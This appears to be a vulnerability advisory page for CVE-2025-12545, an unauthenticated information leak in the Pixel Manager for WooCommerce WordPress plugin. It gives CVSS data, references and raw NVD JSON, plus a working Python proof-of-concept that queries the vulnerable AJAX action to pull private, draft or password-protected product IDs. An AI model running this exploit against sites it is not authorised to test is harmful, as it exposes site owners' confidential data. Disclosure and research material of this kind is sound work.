Security Vulnerability Report
CVE-2025-12545 CVSS 5.3 MEDIUM

Published: 2025-11-18 15:16:26
Last Modified: 2026-04-15 00:35:42

Description

The Pixel Manager for WooCommerce – Track Conversions and Analytics, Google Ads, TikTok and more plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.49.2 via the ajax_pmw_get_product_ids() function due to insufficient restrictions on which products can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft products that they should not have access to.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Pixel Manager for WooCommerce plugin <= 1.49.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2025-12545 PoC - Information Exposure in Pixel Manager for WooCommerce
# Target: WordPress site with Pixel Manager for WooCommerce plugin <= 1.49.2


def exploit_cve_2025_12545(target_url):
    """
    Exploit for information disclosure vulnerability in ajax_pmw_get_product_ids()
    This PoC demonstrates how an unauthenticated attacker can extract protected product data.
    """
    # Target AJAX endpoint
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"

    # Prepare the malicious request
    data = {
        'action': 'pmw_get_product_ids',  # Vulnerable AJAX action
    }

    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'
    }

    try:
        # Send unauthenticated request
        response = requests.post(ajax_url, data=data, headers=headers, timeout=10)

        if response.status_code == 200:
            result = response.json()
            print("[+] Request successful!")
            print(f"[+] Response: {json.dumps(result, indent=2)}")

            # Check if we got product IDs including protected ones
            if 'data' in result and 'product_ids' in result['data']:
                product_ids = result['data']['product_ids']
                print(f"[+] Found {len(product_ids)} product IDs")
                print(f"[+] Product IDs: {product_ids}")
            return True
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            return False
    except (requests.exceptions.RequestException, ValueError) as e:
        # ValueError covers a non-JSON response body from response.json()
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    # Replace with target URL
    target = "https://example.com"
    exploit_cve_2025_12545(target)
```

References

https://plugins.trac.wordpress.org/browser/woocommerce-google-adwords-conversion-tracking-tag/tags/1.49.2/includes/pixels/class-pixel-manager.php#L1235
https://plugins.trac.wordpress.org/browser/woocommerce-google-adwords-conversion-tracking-tag/tags/1.49.2/includes/pixels/class-pixel-manager.php#L343
https://www.wordfence.com/threat-intel/vulnerabilities/id/9babb946-4033-4e66-8f59-b73185ffcd49?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12545",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-18T15:16:26.483",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Pixel Manager for WooCommerce – Track Conversions and Analytics, Google Ads, TikTok and more plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.49.2 via the ajax_pmw_get_product_ids() function due to insufficient restrictions on which products can be included. This makes it possible for unauthenticated attackers to extract data from password protected, private, or draft products that they should not have access to."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-200"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/woocommerce-google-adwords-conversion-tracking-tag/tags/1.49.2/includes/pixels/class-pixel-manager.php#L1235",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/woocommerce-google-adwords-conversion-tracking-tag/tags/1.49.2/includes/pixels/class-pixel-manager.php#L343",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9babb946-4033-4e66-8f59-b73185ffcd49?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```